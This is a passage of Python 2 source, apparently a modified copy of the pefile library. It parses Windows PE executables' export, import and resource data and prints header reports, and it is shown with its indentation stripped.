safety_boundary = section.VirtualAddress + len(section.get_data()) - export_dir.AddressOfNames
print "Safety boundary %x, num names %d" % (safety_boundary, min( export_dir.NumberOfNames, safety_boundary/4))
for i in xrange( min( export_dir.NumberOfNames, safety_boundary/4) ):
symbol_name_address = self.get_dword_from_data(address_of_names, i)
if symbol_name_address is None:
max_failed_entries_before_giving_up -= 1
if max_failed_entries_before_giving_up <= 0:
break
symbol_name = self.get_string_at_rva( symbol_name_address )
if not is_valid_function_name(symbol_name):
break
try:
symbol_name_offset = self.get_offset_from_rva( symbol_name_address )
except PEFormatError:
max_failed_entries_before_giving_up -= 1
if max_failed_entries_before_giving_up <= 0:
break
continue
symbol_ordinal = self.get_word_from_data(
address_of_name_ordinals, i)
if symbol_ordinal is not None and symbol_ordinal*4 < len(address_of_functions):
symbol_address = self.get_dword_from_data(
address_of_functions, symbol_ordinal)
else:
# Corrupt? a bad pointer... we assume it's all
# useless, no exports
return None
if symbol_address is None or symbol_address == 0:
continue
# If the function's RVA points within the export directory
# it will point to a string with the forwarded symbol's string
# instead of pointing to the function's start address.
if symbol_address >= rva and symbol_address < rva+size:
forwarder_str = self.get_string_at_rva(symbol_address)
try:
forwarder_offset = self.get_offset_from_rva( symbol_address )
except PEFormatError:
continue
else:
forwarder_str = None
forwarder_offset = None
exports.append(
ExportData(
pe = self,
ordinal = export_dir.Base+symbol_ordinal,
ordinal_offset = self.get_offset_from_rva( export_dir.AddressOfNameOrdinals + 2*i ),
address = symbol_address,
address_offset = self.get_offset_from_rva( export_dir.AddressOfFunctions + 4*symbol_ordinal ),
name = symbol_name,
name_offset = symbol_name_offset,
forwarder = forwarder_str,
forwarder_offset = forwarder_offset ))
ordinals = [exp.ordinal for exp in exports]
max_failed_entries_before_giving_up = 10
section = self.get_section_by_rva(export_dir.AddressOfFunctions)
if not section:
self.__warnings.append(
'RVA AddressOfFunctions in the export directory points to an invalid address: %x' %
export_dir.AddressOfFunctions)
return
safety_boundary = section.VirtualAddress + len(section.get_data()) - export_dir.AddressOfFunctions
print "Safety2 boundary %x, num names %d" % (safety_boundary, min( export_dir.NumberOfNames, safety_boundary/4))
for idx in xrange( min(export_dir.NumberOfFunctions, safety_boundary/4) ):
if not idx+export_dir.Base in ordinals:
try:
symbol_address = self.get_dword_from_data(
address_of_functions, idx)
except PEFormatError:
symbol_address = None
if symbol_address is None:
max_failed_entries_before_giving_up -= 1
if max_failed_entries_before_giving_up <= 0:
break
if symbol_address == 0:
continue
#
# Checking for forwarder again.
#
if symbol_address >= rva and symbol_address < rva+size:
forwarder_str = self.get_string_at_rva(symbol_address)
else:
forwarder_str = None
exports.append(
ExportData(
ordinal = export_dir.Base+idx,
address = symbol_address,
name = None,
forwarder = forwarder_str))
return ExportDirData(
struct = export_dir,
symbols = exports)
def dword_align(self, offset, base):
return ((offset+base+3) & 0xfffffffcL) - (base & 0xfffffffcL)
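# dword_align() rounds (offset + base) up to the next 4-byte boundary and
# then re-bases the result, e.g. dword_align(5, 0) == 8 and
# dword_align(4, 0) == 4 (illustrative values, not from the original code).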
def parse_delay_import_directory(self, rva, size):
"""Walk and parse the delay import directory."""
import_descs = []
while True:
try:
# If the RVA is invalid everything would blow up. Some PEs seem to be
# especially nasty and have an invalid RVA.
data = self.get_data( rva, Structure(self.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__).sizeof() )
except PEFormatError, e:
self.__warnings.append(
'Error parsing the Delay import directory at RVA: 0x%x' % ( rva ) )
break
file_offset = self.get_offset_from_rva(rva)
import_desc = self.__unpack_data__(
self.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__,
data, file_offset = file_offset )
# If the structure is all zeros, we reached the end of the list
if not import_desc or import_desc.all_zeroes():
break
rva += import_desc.sizeof()
# If the array of thunks is somewhere earlier than the import
# descriptor we can set a maximum length for the array. Otherwise
# just use the remaining size of the file as the maximum length
max_len = len(self.__data__) - file_offset
if rva > import_desc.pINT or rva > import_desc.pIAT:
max_len = max(rva-import_desc.pINT, rva-import_desc.pIAT)
try:
import_data = self.parse_imports(
import_desc.pINT,
import_desc.pIAT,
None,
max_length = max_len)
except PEFormatError, e:
self.__warnings.append(
'Error parsing the Delay import directory. ' +
'Invalid import data at RVA: 0x%x (%s)' % ( rva, e.value) )
break
if not import_data:
continue
dll = self.get_string_at_rva(import_desc.szName)
if not is_valid_dos_filename(dll):
dll = '*invalid*'
if dll:
for symbol in import_data:
if symbol.name is None:
funcname = ordlookup.ordLookup(dll.lower(), symbol.ordinal)
if funcname:
symbol.name = funcname
import_descs.append(
ImportDescData(
struct = import_desc,
imports = import_data,
dll = dll))
return import_descs
def get_imphash(self):
impstrs = []
exts = ['ocx', 'sys', 'dll']
if not hasattr(self, "DIRECTORY_ENTRY_IMPORT"):
return ""
for entry in self.DIRECTORY_ENTRY_IMPORT:
libname = entry.dll.lower()
parts = libname.rsplit('.', 1)
if len(parts) > 1 and parts[1] in exts:
libname = parts[0]
for imp in entry.imports:
funcname = None
if not imp.name:
funcname = ordlookup.ordLookup(entry.dll.lower(), imp.ordinal, make_name=True)
if not funcname:
raise Exception("Unable to look up ordinal %s:%04x" % (entry.dll, imp.ordinal))
else:
funcname = imp.name
if not funcname:
continue
impstrs.append('%s.%s' % (libname.lower(),funcname.lower()))
return hashlib.md5( ','.join( impstrs ) ).hexdigest()
def parse_import_directory(self, rva, size):
"""Walk and parse the import directory."""
import_descs = []
while True:
try:
# If the RVA is invalid everything would blow up. Some EXEs seem to be
# especially nasty and have an invalid RVA.
data = self.get_data(rva, Structure(self.__IMAGE_IMPORT_DESCRIPTOR_format__).sizeof() )
except PEFormatError, e:
self.__warnings.append(
'Error parsing the import directory at RVA: 0x%x' % ( rva ) )
break
file_offset = self.get_offset_from_rva(rva)
import_desc = self.__unpack_data__(
self.__IMAGE_IMPORT_DESCRIPTOR_format__,
data, file_offset = file_offset )
# If the structure is all zeros, we reached the end of the list
if not import_desc or import_desc.all_zeroes():
break
rva += import_desc.sizeof()
# If the array of thunks is somewhere earlier than the import
# descriptor we can set a maximum length for the array. Otherwise
# just use the remaining size of the file as the maximum length
max_len = len(self.__data__) - file_offset
if rva > import_desc.OriginalFirstThunk or rva > import_desc.FirstThunk:
max_len = max(rva-import_desc.OriginalFirstThunk, rva-import_desc.FirstThunk)
try:
import_data = self.parse_imports(
import_desc.OriginalFirstThunk,
import_desc.FirstThunk,
import_desc.ForwarderChain,
max_length = max_len)
except PEFormatError, e:
self.__warnings.append(
'Error parsing the import directory. ' +
'Invalid Import data at RVA: 0x%x (%s)' % ( rva, e.value ) )
break
if not import_data:
continue
dll = self.get_string_at_rva(import_desc.Name)
if not is_valid_dos_filename(dll):
dll = '*invalid*'
if dll:
for symbol in import_data:
if symbol.name is None:
funcname = ordlookup.ordLookup(dll.lower(), symbol.ordinal)
if funcname:
symbol.name = funcname
import_descs.append(
ImportDescData(
struct = import_desc,
imports = import_data,
dll = dll))
suspicious_imports = set([ 'LoadLibrary', 'GetProcAddress' ])
suspicious_imports_count = 0
total_symbols = 0
for imp_dll in import_descs:
for symbol in imp_dll.imports:
for suspicious_symbol in suspicious_imports:
if symbol and symbol.name and symbol.name.startswith( suspicious_symbol ):
suspicious_imports_count += 1
break
total_symbols += 1
if suspicious_imports_count == len(suspicious_imports) and total_symbols < 20:
self.__warnings.append(
'Imported symbols contain entries typical of packed executables.' )
return import_descs
def parse_imports(self, original_first_thunk, first_thunk, forwarder_chain, max_length=None):
"""Parse the imported symbols.
Returns a list of ImportData instances, one per imported symbol,
built from the Import Lookup Table and the Import Address Table
referenced by the descriptor being parsed.
"""
imported_symbols = []
# The following has been commented as a PE does not
# need to have the import data necessarily within
# a section, it can keep it in gaps between sections
# or overlapping other data.
#
#imports_section = self.get_section_by_rva(first_thunk)
#if not imports_section:
# raise PEFormatError, 'Invalid/corrupt imports.'
# Import Lookup Table. Contains ordinals or pointers to strings.
ilt = self.get_import_table(original_first_thunk, max_length)
# Import Address Table. May have identical content to the ILT if the
# PE file is not bound. It will contain the addresses of the
# imported symbols once the binary is loaded or if it is already
# bound.
iat = self.get_import_table(first_thunk, max_length)
# OC Patch:
# Would crash if IAT or ILT had None type
if (not iat or len(iat)==0) and (not ilt or len(ilt)==0):
raise PEFormatError(
'Invalid Import Table information. ' +
'Both ILT and IAT appear to be broken.')
table = None
if ilt:
table = ilt
elif iat:
table = iat
else:
return None
imp_offset = 4
address_mask = 0x7fffffff
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
ordinal_flag = IMAGE_ORDINAL_FLAG
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
ordinal_flag = IMAGE_ORDINAL_FLAG64
imp_offset = 8
address_mask = 0x7fffffffffffffffL
num_invalid = 0
for idx in xrange(len(table)):
imp_ord = None
imp_hint = None
imp_name = None
name_offset = None
hint_name_table_rva = None
if table[idx].AddressOfData:
# If imported by ordinal, we will append the ordinal number
#
if table[idx].AddressOfData & ordinal_flag:
import_by_ordinal = True
imp_ord = table[idx].AddressOfData & 0xffff
imp_name = None
name_offset = None
else:
import_by_ordinal = False
try:
hint_name_table_rva = table[idx].AddressOfData & address_mask
data = self.get_data(hint_name_table_rva, 2)
# Get the Hint
imp_hint = self.get_word_from_data(data, 0)
imp_name = self.get_string_at_rva(table[idx].AddressOfData+2)
if not is_valid_function_name(imp_name):
imp_name = '*invalid*'
name_offset = self.get_offset_from_rva(table[idx].AddressOfData+2)
except PEFormatError, e:
pass
# by nriva: we want the ThunkRVA and ThunkOffset
thunk_offset = table[idx].get_file_offset()
thunk_rva = self.get_rva_from_offset(thunk_offset)
imp_address = first_thunk + self.OPTIONAL_HEADER.ImageBase + idx * imp_offset
struct_iat = None
try:
if iat and ilt and ilt[idx].AddressOfData != iat[idx].AddressOfData:
imp_bound = iat[idx].AddressOfData
struct_iat = iat[idx]
else:
imp_bound = None
except IndexError:
imp_bound = None
# The file with hashes:
#
# MD5: bfe97192e8107d52dd7b4010d12b2924
# SHA256: 3d22f8b001423cb460811ab4f4789f277b35838d45c62ec0454c877e7c82c7f5
#
# has an invalid table built in a way that it's parseable but contains invalid
# entries that lead pefile to take extremely long amounts of time to
# parse. It also leads to extreme memory consumption.
# To prevent similar cases, if invalid entries are found in the middle of a
# table the parsing will be aborted
#
if imp_ord is None and imp_name is None:
raise PEFormatError('Invalid entries, aborting parsing.')
# Some PEs appear to interleave valid and invalid imports. Instead of
# aborting the parsing altogether we will simply skip the invalid entries.
# Although if we see 1000 invalid entries and no legit ones, we abort.
if imp_name == '*invalid*':
if num_invalid > 1000 and num_invalid == idx:
raise PEFormatError('Too many invalid names, aborting parsing.')
num_invalid += 1
continue
if imp_name != '' and (imp_ord or imp_name):
imported_symbols.append(
ImportData(
pe = self,
struct_table = table[idx],
struct_iat = struct_iat, # for bound imports if any
import_by_ordinal = import_by_ordinal,
ordinal = imp_ord,
ordinal_offset = table[idx].get_file_offset(),
hint = imp_hint,
name = imp_name,
name_offset = name_offset,
bound = imp_bound,
address = imp_address,
hint_name_table_rva = hint_name_table_rva,
thunk_offset = thunk_offset,
thunk_rva = thunk_rva ))
return imported_symbols
def get_import_table(self, rva, max_length=None):
table = []
# We need the ordinal flag for a simple heuristic
# we're implementing within the loop
#
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
ordinal_flag = IMAGE_ORDINAL_FLAG
format = self.__IMAGE_THUNK_DATA_format__
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
ordinal_flag = IMAGE_ORDINAL_FLAG64
format = self.__IMAGE_THUNK_DATA64_format__
MAX_ADDRESS_SPREAD = 128*2**20 # 128 MB
MAX_REPEATED_ADDRESSES = 15
repeated_address = 0
addresses_of_data_set_64 = set()
addresses_of_data_set_32 = set()
start_rva = rva
while True and rva:
if max_length is not None and rva >= start_rva+max_length:
self.__warnings.append(
'Error parsing the import table. Entries go beyond bounds.')
break
# if we see the same entry too many times we assume it could be
# a table containing bogus data (with malicious intent or otherwise)
if repeated_address >= MAX_REPEATED_ADDRESSES:
return []
# if the addresses point somewhere but the difference between the highest
# and lowest address is larger than MAX_ADDRESS_SPREAD we assume a bogus
# table as the addresses should be contained within a module
if (addresses_of_data_set_32 and
max(addresses_of_data_set_32) - min(addresses_of_data_set_32) > MAX_ADDRESS_SPREAD ):
return []
if (addresses_of_data_set_64 and
max(addresses_of_data_set_64) - min(addresses_of_data_set_64) > MAX_ADDRESS_SPREAD ):
return []
failed = False
try:
data = self.get_data(rva, Structure(format).sizeof())
except PEFormatError, e:
failed = True
if failed or len(data) != Structure(format).sizeof():
self.__warnings.append(
'Error parsing the import table. ' +
'Invalid data at RVA: 0x%x' % rva)
return None
thunk_data = self.__unpack_data__(
format, data, file_offset=self.get_offset_from_rva(rva) )
# Check whether the AddressOfData lies within the range of RVAs currently
# being scanned and abort if that is the case, as it is very unlikely
# to be legitimate data.
# Seen in PE with SHA256:
# 5945bb6f0ac879ddf61b1c284f3b8d20c06b228e75ae4f571fa87f5b9512902c
if thunk_data.AddressOfData >= start_rva and thunk_data.AddressOfData <= rva:
self.__warnings.append(
'Error parsing the import table. ' +
'AddressOfData overlaps with THUNK_DATA for ' +
'THUNK at RVA 0x%x' % ( rva ) )
break
if thunk_data and thunk_data.AddressOfData:
# If the entry looks like it could be an ordinal...
if thunk_data.AddressOfData & ordinal_flag:
# but its value is beyond 2^16, we will assume it's
# corrupted and ignore it altogether
if thunk_data.AddressOfData & 0x7fffffff > 0xffff:
return []
# and if it looks like it should be an RVA
else:
# keep track of the RVAs seen and store them to study their
# properties. When certain non-standard features are detected
# the parsing will be aborted
if (thunk_data.AddressOfData in addresses_of_data_set_32 or
thunk_data.AddressOfData in addresses_of_data_set_64):
repeated_address += 1
if thunk_data.AddressOfData >= 2**32:
addresses_of_data_set_64.add(thunk_data.AddressOfData)
else:
addresses_of_data_set_32.add(thunk_data.AddressOfData)
if not thunk_data or thunk_data.all_zeroes():
break
rva += thunk_data.sizeof()
table.append(thunk_data)
return table
def get_memory_mapped_image(self, max_virtual_address=0x10000000, ImageBase=None):
"""Returns the data corresponding to the memory layout of the PE file.
The data includes the PE header and the sections loaded at offsets
corresponding to their relative virtual addresses. (the VirtualAddress
section header member).
Any offset in this data corresponds to the absolute memory address
ImageBase+offset.
The optional argument 'max_virtual_address' provides a means of limiting
which sections are processed.
Any section with its VirtualAddress beyond this value will be skipped.
Normally, sections with values beyond this range are just there to confuse
tools. It's a common trick to see in packed executables.
If the 'ImageBase' optional argument is supplied, the file's relocations
will be applied to the image by calling the 'relocate_image()' method. Beware
that the relocation information is applied permanently.
"""
# Rebase if requested
#
if ImageBase is not None:
# Keep a copy of the image's data before modifying it by rebasing it
#
original_data = self.__data__
self.relocate_image(ImageBase)
# Collect all sections in one code block
#mapped_data = self.header
mapped_data = '' + self.__data__[:]
for section in self.sections:
# Miscellaneous integrity tests.
# Some packers will set these to bogus values to
# make tools go nuts.
#
if section.Misc_VirtualSize == 0 or section.SizeOfRawData == 0:
continue
if section.SizeOfRawData > len(self.__data__):
continue
if self.adjust_FileAlignment( section.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment ) > len(self.__data__):
continue
VirtualAddress_adj = self.adjust_SectionAlignment( section.VirtualAddress,
self.OPTIONAL_HEADER.SectionAlignment, self.OPTIONAL_HEADER.FileAlignment )
if VirtualAddress_adj >= max_virtual_address:
continue
padding_length = VirtualAddress_adj - len(mapped_data)
if padding_length>0:
mapped_data += '\0'*padding_length
elif padding_length<0:
mapped_data = mapped_data[:padding_length]
mapped_data += section.get_data()
# If the image was rebased, restore it to its original form
#
if ImageBase is not None:
self.__data__ = original_data
return mapped_data
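# Usage sketch: a minimal example of dumping the memory layout produced by
# get_memory_mapped_image(). It assumes this module is importable as 'pefile',
# that the enclosing class is instantiated as pefile.PE(path), and that the
# file names are placeholders.
#
#   import pefile
#   pe = pefile.PE('sample.exe')
#   mapped = pe.get_memory_mapped_image()
#   with open('sample.mapped.bin', 'wb') as out:
#       out.write(mapped)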
def get_resources_strings(self):
"""Returns a list of all the strings found withing the resources (if any).
This method will scan all entries in the resources directory of the PE, if
there is one, and will return a list() with the strings.
An empty list will be returned otherwise.
"""
resources_strings = list()
if hasattr(self, 'DIRECTORY_ENTRY_RESOURCE'):
for resource_type in self.DIRECTORY_ENTRY_RESOURCE.entries:
if hasattr(resource_type, 'directory'):
for resource_id in resource_type.directory.entries:
if hasattr(resource_id, 'directory'):
if hasattr(resource_id.directory, 'strings') and resource_id.directory.strings:
for res_string in resource_id.directory.strings.values():
resources_strings.append( res_string )
return resources_strings
def get_data(self, rva=0, length=None):
"""Get data regardless of the section where it lies on.
Given a RVA and the size of the chunk to retrieve, this method
will find the section where the data lies and return the data.
"""
s = self.get_section_by_rva(rva)
if length:
end = rva + length
else:
end = None
if not s:
if rva < len(self.header):
return self.header[rva:end]
# Before we give up we check whether the file might
# contain the data anyway. There are cases of PE files
# without sections that rely on windows loading the first
# 8291 bytes into memory and assume the data will be
# there
# A functional file with these characteristics is:
# MD5: 0008892cdfbc3bda5ce047c565e52295
# SHA-1: c7116b9ff950f86af256defb95b5d4859d4752a9
#
if rva < len(self.__data__):
return self.__data__[rva:end]
raise PEFormatError, 'data at RVA can\'t be fetched. Corrupt header?'
return s.get_data(rva, length)
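# Usage sketch: reading raw bytes at an RVA, assuming the enclosing class is
# instantiated as pefile.PE(path). AddressOfEntryPoint is a standard
# OPTIONAL_HEADER field; the file name is a placeholder.
#
#   import pefile
#   pe = pefile.PE('sample.exe')
#   ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
#   first_bytes = pe.get_data(ep, 16)
#   print(repr(first_bytes))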
def get_rva_from_offset(self, offset):
"""Get the RVA corresponding to this file offset. """
s = self.get_section_by_offset(offset)
if not s:
if self.sections:
lowest_rva = min( [ self.adjust_SectionAlignment( s.VirtualAddress,
self.OPTIONAL_HEADER.SectionAlignment, self.OPTIONAL_HEADER.FileAlignment ) for s in self.sections] )
if offset < lowest_rva:
# We will assume that the offset lies within the headers, or
# at least points before where the earliest section starts
# and we will simply return the offset as the RVA
#
# The case illustrating this behavior can be found at:
# http://corkami.blogspot.com/2010/01/hey-hey-hey-whats-in-your-head.html
# where the import table is not contained by any section
# hence the RVA needs to be resolved to a raw offset
return offset
# bug here.. falls through
else:
return offset
#raise PEFormatError("specified offset (0x%x) doesn't belong to any section." % offset)
return s.get_rva_from_offset(offset)
def get_offset_from_rva(self, rva):
"""Get the file offset corresponding to this RVA.
Given a RVA , this method will find the section where the
data lies and return the offset within the file.
"""
s = self.get_section_by_rva(rva)
if not s:
# If not found within a section assume it might
# point to overlay data or otherwise data present
# but not contained in any section. In those
# cases the RVA should equal the offset
if rva<len(self.__data__):
return rva
raise PEFormatError, 'data at RVA can\'t be fetched. Corrupt header?'
return s.get_offset_from_rva(rva)
def get_string_at_rva(self, rva):
"""Get an ASCII string located at the given address."""
if rva is None:
return None
s = self.get_section_by_rva(rva)
if not s:
return self.get_string_from_data(0, self.__data__[rva:rva+MAX_STRING_LENGTH])
return self.get_string_from_data( 0, s.get_data(rva, length=MAX_STRING_LENGTH) )
def get_string_from_data(self, offset, data):
"""Get an ASCII string from within the data."""
# OC Patch
b = None
try:
b = data[offset]
except IndexError:
return ''
s = ''
while ord(b):
s += b
offset += 1
try:
b = data[offset]
except IndexError:
break
return s
def get_string_u_at_rva(self, rva, max_length = 2**16):
"""Get an Unicode string located at the given address."""
try:
# If the RVA is invalid everything would blow up. Some EXEs seem to be
# especially nasty and have an invalid RVA.
data = self.get_data(rva, 2)
except PEFormatError, e:
return None
s = u''
for idx in xrange(max_length):
try:
uchr = struct.unpack('<H', self.get_data(rva+2*idx, 2))[0]
except struct.error:
break
if unichr(uchr) == u'\0':
break
s += unichr(uchr)
return s
def get_section_by_offset(self, offset):
"""Get the section containing the given file offset."""
sections = [s for s in self.sections if s.contains_offset(offset)]
if sections:
return sections[0]
return None
def get_section_by_rva(self, rva):
"""Get the section containing the given address."""
sections = [s for s in self.sections if s.contains_rva(rva)]
if sections:
return sections[0]
return None
def __str__(self):
return self.dump_info()
def print_info(self):
"""Print all the PE header information in a human readable from."""
print self.dump_info()
def dump_info(self, dump=None):
"""Dump all the PE header information into human readable string."""
if dump is None:
dump = Dump()
warnings = self.get_warnings()
if warnings:
dump.add_header('Parsing Warnings')
for warning in warnings:
dump.add_line(warning)
dump.add_newline()
dump.add_header('DOS_HEADER')
dump.add_lines(self.DOS_HEADER.dump())
dump.add_newline()
dump.add_header('NT_HEADERS')
dump.add_lines(self.NT_HEADERS.dump())
dump.add_newline()
dump.add_header('FILE_HEADER')
dump.add_lines(self.FILE_HEADER.dump())
image_flags = retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
dump.add('Flags: ')
flags = []
for flag in image_flags:
if getattr(self.FILE_HEADER, flag[0]):
flags.append(flag[0])
dump.add_line(', '.join(flags))
dump.add_newline()
if hasattr(self, 'OPTIONAL_HEADER') and self.OPTIONAL_HEADER is not None:
dump.add_header('OPTIONAL_HEADER')
dump.add_lines(self.OPTIONAL_HEADER.dump())
dll_characteristics_flags = retrieve_flags(DLL_CHARACTERISTICS, 'IMAGE_DLLCHARACTERISTICS_')
dump.add('DllCharacteristics: ')
flags = []
for flag in dll_characteristics_flags:
if getattr(self.OPTIONAL_HEADER, flag[0]):
flags.append(flag[0])
dump.add_line(', '.join(flags))
dump.add_newline()
dump.add_header('PE Sections')
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
for section in self.sections:
dump.add_lines(section.dump())
dump.add('Flags: ')
flags = []
for flag in section_flags:
if getattr(section, flag[0]):
flags.append(flag[0])
dump.add_line(', '.join(flags))
dump.add_line('Entropy: %f (Min=0.0, Max=8.0)' % section.get_entropy() )
if md5 is not None:
dump.add_line('MD5 hash: %s' % section.get_hash_md5() )
if sha1 is not None:
dump.add_line('SHA-1 hash: %s' % section.get_hash_sha1() )
if sha256 is not None:
dump.add_line('SHA-256 hash: %s' % section.get_hash_sha256() )
if sha512 is not None:
dump.add_line('SHA-512 hash: %s' % section.get_hash_sha512() )
dump.add_newline()
if (hasattr(self, 'OPTIONAL_HEADER') and
hasattr(self.OPTIONAL_HEADER, 'DATA_DIRECTORY') ):
dump.add_header('Directories')
for idx in xrange(len(self.OPTIONAL_HEADER.DATA_DIRECTORY)):
directory = self.OPTIONAL_HEADER.DATA_DIRECTORY[idx]
dump.add_lines(directory.dump())
dump.add_newline()
def convert_char(char):
if char in string.ascii_letters or char in string.digits or char in string.punctuation or char in string.whitespace:
return char
else:
return r'\x%02x' % ord(char)
def convert_to_printable(s):
return ''.join([convert_char(c) for c in s])
if hasattr(self, 'VS_VERSIONINFO'):
dump.add_header('Version Information')
dump.add_lines(self.VS_VERSIONINFO.dump())
dump.add_newline()
if hasattr(self, 'VS_FIXEDFILEINFO'):
dump.add_lines(self.VS_FIXEDFILEINFO.dump())
dump.add_newline()
if hasattr(self, 'FileInfo'):
for entry in self.FileInfo:
dump.add_lines(entry.dump())
dump.add_newline()
if hasattr(entry, 'StringTable'):
for st_entry in entry.StringTable:
[dump.add_line(' '+line) for line in st_entry.dump()]
dump.add_line(' LangID: '+st_entry.LangID)
dump.add_newline()
for str_entry in st_entry.entries.items():
dump.add_line( ' ' +
convert_to_printable(str_entry[0]) + ': ' +
convert_to_printable(str_entry[1]) )
dump.add_newline()
elif hasattr(entry, 'Var'):
for var_entry in entry.Var:
if hasattr(var_entry, 'entry'):
[dump.add_line(' '+line) for line in var_entry.dump()]
dump.add_line(
' ' +
convert_to_printable(var_entry.entry.keys()[0]) +
': ' + var_entry.entry.values()[0])
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_EXPORT'):
dump.add_header('Exported symbols')
dump.add_lines(self.DIRECTORY_ENTRY_EXPORT.struct.dump())
dump.add_newline()
dump.add_line('%-10s %-10s %s' % ('Ordinal', 'RVA', 'Name'))
for export in self.DIRECTORY_ENTRY_EXPORT.symbols:
if export.address is not None:
dump.add('%-10d 0x%08Xh %s' % (
export.ordinal, export.address, export.name))
if export.forwarder:
dump.add_line(' forwarder: %s' % export.forwarder)
else:
dump.add_newline()
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_IMPORT'):
dump.add_header('Imported symbols')
for module in self.DIRECTORY_ENTRY_IMPORT:
dump.add_lines(module.struct.dump())
dump.add_newline()
for symbol in module.imports:
if symbol.import_by_ordinal is True:
if symbol.name is not None:
dump.add('%s.%s Ordinal[%s] (Imported by Ordinal)' % (
module.dll, symbol.name, str(symbol.ordinal)))
else:
dump.add('%s Ordinal[%s] (Imported by Ordinal)' % (
module.dll, str(symbol.ordinal)))
else:
dump.add('%s.%s Hint[%s]' % (
module.dll, symbol.name, str(symbol.hint)))
if symbol.bound:
dump.add_line(' Bound: 0x%08X' % (symbol.bound))
else:
dump.add_newline()
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_BOUND_IMPORT'):
dump.add_header('Bound imports')
for bound_imp_desc in self.DIRECTORY_ENTRY_BOUND_IMPORT:
dump.add_lines(bound_imp_desc.struct.dump())
dump.add_line('DLL: %s' % bound_imp_desc.name)
dump.add_newline()
for bound_imp_ref in bound_imp_desc.entries:
dump.add_lines(bound_imp_ref.struct.dump(), 4)
dump.add_line('DLL: %s' % bound_imp_ref.name, 4)
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_DELAY_IMPORT'):
dump.add_header('Delay Imported symbols')
for module in self.DIRECTORY_ENTRY_DELAY_IMPORT:
dump.add_lines(module.struct.dump())
dump.add_newline()
for symbol in module.imports:
if symbol.import_by_ordinal is True:
dump.add('%s Ordinal[%s] (Imported by Ordinal)' % (
module.dll, str(symbol.ordinal)))
else:
dump.add('%s.%s Hint[%s]' % (
module.dll, symbol.name, str(symbol.hint)))
if symbol.bound:
dump.add_line(' Bound: 0x%08X' % (symbol.bound))
else:
dump.add_newline()
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_RESOURCE'):
dump.add_header('Resource directory')
dump.add_lines(self.DIRECTORY_ENTRY_RESOURCE.struct.dump())
for resource_type in self.DIRECTORY_ENTRY_RESOURCE.entries:
if resource_type.name is not None:
dump.add_line('Name: [%s]' % resource_type.name, 2)
else:
dump.add_line('Id: [0x%X] (%s)' % (
resource_type.struct.Id, RESOURCE_TYPE.get(
resource_type.struct.Id, '-')),
2)
dump.add_lines(resource_type.struct.dump(), 2)
if hasattr(resource_type, 'directory'):
dump.add_lines(resource_type.directory.struct.dump(), 4)
for resource_id in resource_type.directory.entries:
if resource_id.name is not None:
dump.add_line('Name: [%s]' % resource_id.name, 6)
else:
dump.add_line('Id: [0x%X]' % resource_id.struct.Id, 6)
dump.add_lines(resource_id.struct.dump(), 6)
if hasattr(resource_id, 'directory'):
dump.add_lines(resource_id.directory.struct.dump(), 8)
for resource_lang in resource_id.directory.entries:
if hasattr(resource_lang, 'data'):
dump.add_line('\\--- LANG [%d,%d][%s,%s]' % (
resource_lang.data.lang,
resource_lang.data.sublang,
LANG.get(resource_lang.data.lang, '*unknown*'),
get_sublang_name_for_lang( resource_lang.data.lang, resource_lang.data.sublang ) ), 8)
dump.add_lines(resource_lang.struct.dump(), 10)
dump.add_lines(resource_lang.data.struct.dump(), 12)
if hasattr(resource_id.directory, 'strings') and resource_id.directory.strings:
dump.add_line( '[STRINGS]' , 10 )
for idx, res_string in resource_id.directory.strings.items():
dump.add_line( '%6d: %s' % (idx, convert_to_printable(res_string) ), 12 )
dump.add_newline()
dump.add_newline()
if ( hasattr(self, 'DIRECTORY_ENTRY_TLS') and
self.DIRECTORY_ENTRY_TLS and
self.DIRECTORY_ENTRY_TLS.struct ):
dump.add_header('TLS')
dump.add_lines(self.DIRECTORY_ENTRY_TLS.struct.dump())
dump.add_newline()
if ( hasattr(self, 'DIRECTORY_ENTRY_LOAD_CONFIG') and
self.DIRECTORY_ENTRY_LOAD_CONFIG and
self.DIRECTORY_ENTRY_LOAD_CONFIG.struct ):
dump.add_header('LOAD_CONFIG')
dump.add_lines(self.DIRECTORY_ENTRY_LOAD_CONFIG.struct.dump())
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_DEBUG'):
dump.add_header('Debug information')
for dbg in self.DIRECTORY_ENTRY_DEBUG:
dump.add_lines(dbg.struct.dump())
try:
dump.add_line('Type: '+DEBUG_TYPE[dbg.struct.Type])
except KeyError:
dump.add_line('Type: 0x%x(Unknown)' % dbg.struct.Type)
dump.add_newline()
if hasattr(self, 'DIRECTORY_ENTRY_BASERELOC'):
dump.add_header('Base relocations')
for base_reloc in self.DIRECTORY_ENTRY_BASERELOC:
dump.add_lines(base_reloc.struct.dump())
for reloc in base_reloc.entries:
try:
dump.add_line('%08Xh %s' % (
reloc.rva, RELOCATION_TYPE[reloc.type][16:]), 4)
except KeyError:
dump.add_line('0x%08X 0x%x(Unknown)' % (
reloc.rva, reloc.type), 4)
dump.add_newline()
return dump.get_text()
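# Usage sketch: writing the human readable report produced by dump_info() to a
# text file, assuming the enclosing class is instantiated as pefile.PE(path);
# file names are placeholders.
#
#   import pefile
#   pe = pefile.PE('sample.exe')
#   with open('sample_report.txt', 'w') as report:
#       report.write(pe.dump_info())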
def dump_dict(self, dump=None):
"""Dump all the PE header information into a dictionary."""
dump_dict = dict()
warnings = self.get_warnings()
if warnings:
dump_dict['Parsing Warnings'] = warnings
dump_dict['DOS_HEADER'] = self.DOS_HEADER.dump_dict()
dump_dict['NT_HEADERS'] = self.NT_HEADERS.dump_dict()
dump_dict['FILE_HEADER'] = self.FILE_HEADER.dump_dict()
